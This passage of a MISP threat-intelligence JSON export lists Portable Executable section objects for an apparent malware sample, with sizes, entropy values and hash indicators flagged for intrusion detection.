"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1595203553",
"to_ids": true,
"type": "sha1",
"uuid": "b02f2918-947b-4bec-a72b-c568ffed65f0",
"value": "5dc20661046ffa7cca66eb047ee01abc3ef935fa"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1595203570",
"to_ids": true,
"type": "sha256",
"uuid": "13779cd7-ab49-47f6-87bd-322ac8ea3b9f",
"value": "f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1595203616",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "a6a70357-641e-4c19-8a45-06f722754719",
"value": "7334"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393563",
"uuid": "5e30f0a7-f2e0-4669-aadd-6ef0de574e31",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393563",
"to_ids": false,
"type": "text",
"uuid": "e2ec184c-a31f-4ade-ae4c-642a7e65c614",
"value": ".rdar"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393563",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "a9d9c4fb-0f1b-4da7-b648-4b4076d6a949",
"value": "12288"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393563",
"to_ids": false,
"type": "float",
"uuid": "ba24c52b-8652-4f97-8f8a-eac7066f35da",
"value": "6.6775358173282"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393563",
"to_ids": true,
"type": "md5",
"uuid": "ff4673d1-baae-4215-97d6-98ea38fa85c8",
"value": "942ccd316a0ee518903e4835680d1881"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393575",
"to_ids": true,
"type": "sha1",
"uuid": "20c7e874-c65d-43ce-9182-19767af29a96",
"value": "2e960d47a58b00b89755ed2508b9f135ed2e8b0f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393587",
"to_ids": true,
"type": "sha256",
"uuid": "3bb74816-35df-4e00-ac7b-27600b25cb8f",
"value": "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393599",
"to_ids": true,
"type": "sha512",
"uuid": "2acebc68-ac24-4142-bb8b-2153327f78f1",
"value": "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393611",
"to_ids": true,
"type": "ssdeep",
"uuid": "e28799f0-ca4d-4387-8d3e-cbf555c37642",
"value": "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393616",
"uuid": "b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393623",
"to_ids": false,
"type": "text",
"uuid": "731fc26b-ca0f-4128-9341-4c50111efd41",
"value": ".rdar"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393623",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "de439331-8add-4208-b003-2d4d8e2150dd",
"value": "12288"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393623",
"to_ids": false,
"type": "float",
"uuid": "fd66d66c-ac27-4030-a798-a7e93b0a541a",
"value": "6.6775358173282"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393623",
"to_ids": true,
"type": "md5",
"uuid": "a6b0963f-0575-4067-af56-b7058a2b5b99",
"value": "942ccd316a0ee518903e4835680d1881"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393634",
"to_ids": true,
"type": "sha1",
"uuid": "a33a4b9f-31ce-45ec-a5f9-47f1ffc98384",
"value": "2e960d47a58b00b89755ed2508b9f135ed2e8b0f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393644",
"to_ids": true,
"type": "sha256",
"uuid": "2ae21ea6-f77c-47dc-9c88-f7da7c38992d",
"value": "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393658",
"to_ids": true,
"type": "sha512",
"uuid": "9fbefbb9-f09a-4010-a067-9088c46604f1",
"value": "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393671",
"to_ids": true,
"type": "ssdeep",
"uuid": "4e4b35a9-f9fc-4fb9-9833-75c2b261c0d9",
"value": "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393623",
"uuid": "cda02ce6-6495-448b-a881-94dd8b6ea251",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393623",
"to_ids": false,
"type": "text",
"uuid": "7bf0f1c8-9605-4195-a8b3-6e6ea32eade6",
"value": ".rdata"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393623",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "bc1cbecc-7502-43c0-b231-5802452feee3",
"value": "118784"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393634",
"to_ids": false,
"type": "float",
"uuid": "141fcc00-e7da-40f0-ab02-d471bad2c443",
"value": "7.9900939465467"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393644",
"to_ids": true,
"type": "md5",
"uuid": "e1fb44e1-479d-4e34-87d2-f3ba9ec79ecd",
"value": "55969439752184b954d17e57a02ead13"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393658",
"to_ids": true,
"type": "sha1",
"uuid": "680dee4f-fbb9-4410-ab4c-6298a791bb19",
"value": "630de8954270ef5ac062e63d1f0a357bf27c59e3"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393671",
"to_ids": true,
"type": "sha256",
"uuid": "81470ab2-aff0-425a-97ad-55f1b4896bb9",
"value": "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393685",
"to_ids": true,
"type": "sha512",
"uuid": "f2f20b2d-cb5c-4781-b3c5-c7fdde33fde3",
"value": "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393696",
"to_ids": true,
"type": "ssdeep",
"uuid": "6e091a0c-0855-40f7-add2-6c80515b795f",
"value": "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393685",
"uuid": "2b213ae5-83b6-4e62-b2e9-bb58a3375ef2",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393696",
"to_ids": false,
"type": "text",
"uuid": "a1c86d9f-897f-48a9-a8c5-327bce630d35",
"value": ".rdata"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393696",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "10e6d201-dd9b-45ee-aaf8-4d1d3c0df088",
"value": "118784"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393707",
"to_ids": false,
"type": "float",
"uuid": "4e70dba5-9b88-4a31-9711-54b25fdecaea",
"value": "7.9900939465467"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393707",
"to_ids": true,
"type": "md5",
"uuid": "5633014a-2883-4ad0-8ac8-609587d28d3a",
"value": "55969439752184b954d17e57a02ead13"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393719",
"to_ids": true,
"type": "sha1",
"uuid": "0b9dc2cf-1584-45b6-a6e3-652b330875b6",
"value": "630de8954270ef5ac062e63d1f0a357bf27c59e3"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393740",
"to_ids": true,
"type": "sha256",
"uuid": "e4a7253c-94bd-487d-a995-d65988be8b06",
"value": "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393752",
"to_ids": true,
"type": "sha512",
"uuid": "5fc5c62c-d808-427f-b7fc-8ce4776bf62e",
"value": "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393766",
"to_ids": true,
"type": "ssdeep",
"uuid": "ed4b4255-a9ce-4c32-8ed6-259f5059c932",
"value": "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393707",
"uuid": "3a117e2f-ba72-4253-aae3-e47373b3b29f",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393707",
"to_ids": false,
"type": "text",
"uuid": "2ab03bf0-15e4-4eb2-af30-92242bf54ffb",
"value": ".data"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393719",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "000942ea-74e1-43dd-959b-066f96704a0f",
"value": "69632"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393719",
"to_ids": false,
"type": "float",
"uuid": "97ca357e-b6b9-46c8-b15a-6008a5b3208b",
"value": "7.8568053112406"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393729",
"to_ids": true,
"type": "md5",
"uuid": "017f1fee-7052-44ab-a44e-fef1ea8029a6",
"value": "c59b7c6bdf6d3b6475e830d444c16279"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393752",
"to_ids": true,
"type": "sha1",
"uuid": "2276cac0-c9a4-4267-b95d-da9ead48dd8a",
"value": "4228bd6f4751581bcd745a808244e531568aba61"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393766",
"to_ids": true,
"type": "sha256",
"uuid": "8142c5b2-a53b-4128-98e8-ea2ba4436b4c",
"value": "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393780",
"to_ids": true,
"type": "sha512",
"uuid": "fec67a7c-092d-4a82-b7eb-064c8bca18d9",
"value": "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393792",
"to_ids": true,
"type": "ssdeep",
"uuid": "5f0ed13d-ba7c-460f-83bc-03d21be6ef6e",
"value": "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393780",
"uuid": "78fb4f68-a212-4ba1-af11-4943011c012c",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393792",
"to_ids": false,
"type": "text",
"uuid": "ee88ca61-1273-40df-b15e-7c1cef7a5422",
"value": ".data"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393792",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "ae6080f0-382a-4d2e-b54b-78bbbfd6db95",
"value": "69632"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393804",
"to_ids": false,
"type": "float",
"uuid": "8f146a4a-41de-41f6-bae9-4a6a1f266488",
"value": "7.8568053112406"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393804",
"to_ids": true,
"type": "md5",
"uuid": "be5d5eba-b42b-4d77-88c9-200eee1782a3",
"value": "c59b7c6bdf6d3b6475e830d444c16279"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393814",
"to_ids": true,
"type": "sha1",
"uuid": "28495c52-a066-4c3e-9c80-e4c498da2333",
"value": "4228bd6f4751581bcd745a808244e531568aba61"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393825",
"to_ids": true,
"type": "sha256",
"uuid": "7533d176-2922-49e4-91b5-50db38c441f8",
"value": "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393836",
"to_ids": true,
"type": "sha512",
"uuid": "959e75c1-5c91-4246-9ef3-f79bad253842",
"value": "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393850",
"to_ids": true,
"type": "ssdeep",
"uuid": "bb826f80-d656-4650-ad25-5871e58a5699",
"value": "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393804",
"uuid": "47b6935a-b4bd-4045-b600-c0a4213d3ec1",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393814",
"to_ids": false,
"type": "text",
"uuid": "992e2373-7cf4-4f4a-98a1-2fae9ceeb893",
"value": ".rsrc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393825",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "1c84aa0f-d3cb-4f9d-bd33-a530c005aa02",
"value": "4096"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393825",
"to_ids": false,
"type": "float",
"uuid": "51647ac3-e887-4fef-b56e-dc9a3cafd699",
"value": "3.3542400671361"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393836",
"to_ids": true,
"type": "md5",
"uuid": "8a766358-7028-4969-8feb-c5542a366574",
"value": "fcd1605d1d9f49547d0d1a001563946a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393850",
"to_ids": true,
"type": "sha1",
"uuid": "6ee6d0a6-f0dd-430c-98b8-6b6b8c369f52",
"value": "ac720c8a08e4fb15215b7d2f5181f301a4bdb075"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393864",
"to_ids": true,
"type": "sha256",
"uuid": "e2f9f32d-4c2c-43c4-bac7-c428469b6743",
"value": "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393877",
"to_ids": true,
"type": "sha512",
"uuid": "a9a39f3a-fbc1-436f-8c00-e46953d761d2",
"value": "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393888",
"to_ids": true,
"type": "ssdeep",
"uuid": "1de2af3c-0377-4636-914c-2b99e6e53694",
"value": "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393864",
"uuid": "0dbb4f9b-5415-4aba-b478-3ae76496cbc0",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393865",
"to_ids": false,
"type": "text",
"uuid": "aea237dc-3990-42c9-a520-c16735707264",
"value": ".rsrc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393877",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "f9e63bb3-b550-44da-bb6e-c5273377f0a5",
"value": "4096"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393877",
"to_ids": false,
"type": "float",
"uuid": "43db1d82-3c06-4b43-be0d-ebd732243699",
"value": "3.3542400671361"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393888",
"to_ids": true,
"type": "md5",
"uuid": "52d1185b-7538-4358-bf79-3a8df1aece8c",
"value": "fcd1605d1d9f49547d0d1a001563946a"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393901",
"to_ids": true,
"type": "sha1",
"uuid": "8aa6dd94-f17b-43f8-8cb0-2194177bcd83",
"value": "ac720c8a08e4fb15215b7d2f5181f301a4bdb075"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393913",
"to_ids": true,
"type": "sha256",
"uuid": "c3dc63c7-0999-4fa9-b354-9714660470f5",
"value": "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393923",
"to_ids": true,
"type": "sha512",
"uuid": "4b1faca7-16d1-4fb2-a34a-c2ce3323da95",
"value": "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393938",
"to_ids": true,
"type": "ssdeep",
"uuid": "75cfed24-ec5f-4065-8335-37cb548fb06a",
"value": "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393901",
"uuid": "ae062334-3a88-45b4-9331-ed9a80fc7218",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393912",
"to_ids": false,
"type": "text",
"uuid": "06dea17e-b60d-4211-8f31-8f036cfba40b",
"value": ".reloc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393913",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "0de40bf8-81df-4961-86c9-4e16ff2e15e2",
"value": "4096"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393923",
"to_ids": false,
"type": "float",
"uuid": "a3ca1adf-67fa-42a8-96c1-f3cfc983eb3c",
"value": "5.9461169615076"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393924",
"to_ids": true,
"type": "md5",
"uuid": "6b061b3f-634c-4229-a9d8-cc8979311f1e",
"value": "2e582f4b09f310087abc12cfbf505d06"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393938",
"to_ids": true,
"type": "sha1",
"uuid": "c36c52f0-0ec1-4749-a2e1-9f2fe1fbac00",
"value": "1d6c92f1a273c02c810e23d72d1458a6fd46fec1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393951",
"to_ids": true,
"type": "sha256",
"uuid": "1018c326-f42a-4ada-bee0-6753036899c8",
"value": "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596393962",
"to_ids": true,
"type": "sha512",
"uuid": "5307695d-e49d-42bc-98d1-3c309fb668ce",
"value": "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596393973",
"to_ids": true,
"type": "ssdeep",
"uuid": "1c9fff4a-4705-4728-b3f1-25cbb0a08bf6",
"value": "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a section of a Portable Executable",
"meta-category": "file",
"name": "pe-section",
"template_uuid": "198a17d2-a135-4b25-9a32-5aa4e632014a",
"template_version": "3",
"timestamp": "1596393951",
"uuid": "072b4d8e-b602-458e-9a96-71242a752828",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "name",
"timestamp": "1596393962",
"to_ids": false,
"type": "text",
"uuid": "f3a2141e-1665-4f09-8239-0f5f1136a6ee",
"value": ".reloc"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1596393962",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "db905034-d0c9-473e-8e90-748edeaec6e8",
"value": "4096"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "entropy",
"timestamp": "1596393962",
"to_ids": false,
"type": "float",
"uuid": "5d4c0ee8-ddef-4bb7-8828-8e0cc15edea8",
"value": "5.9461169615076"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1596393973",
"to_ids": true,
"type": "md5",
"uuid": "81abf6c2-3ef7-44dd-897c-e71f1f7ee662",
"value": "2e582f4b09f310087abc12cfbf505d06"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1596393986",
"to_ids": true,
"type": "sha1",
"uuid": "ae0607e4-2deb-4276-ab36-ee504bdf95af",
"value": "1d6c92f1a273c02c810e23d72d1458a6fd46fec1"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1596393997",
"to_ids": true,
"type": "sha256",
"uuid": "621cedb3-22b0-49d3-b41d-8aed1cf563c2",
"value": "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha512",
"timestamp": "1596394008",
"to_ids": true,
"type": "sha512",
"uuid": "39882cc0-0ea1-44ec-8532-90ab9ca93fc6",
"value": "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ssdeep",
"timestamp": "1596394031",
"to_ids": true,
"type": "ssdeep",
"uuid": "d92abd90-8a08-44e9-b5f5-3ce18363dacc",
"value": "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a Portable Executable",
"meta-category": "file",
"name": "pe",
"template_uuid": "cf7adecc-d4f0-4e88-9d90-f978ee151a07",
"template_version": "5",
"timestamp": "1596394247",
"uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"ObjectReference": [
{
"comment": "Section 0 of PE",
"object_uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"referenced_uuid": "5e30f0a7-f2e0-4669-aadd-6ef0de574e31",
"relationship_type": "includes",
"timestamp": "1596394164",
"uuid": "29229584-066e-4e09-ae75-1dd87a48894a"
},
{
"comment": "Section 1 of PE",
"object_uuid": "91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"referenced_uuid": "cda02ce6-6495-448b-a881-94dd8b6ea251",
"relationship_type": "includes",
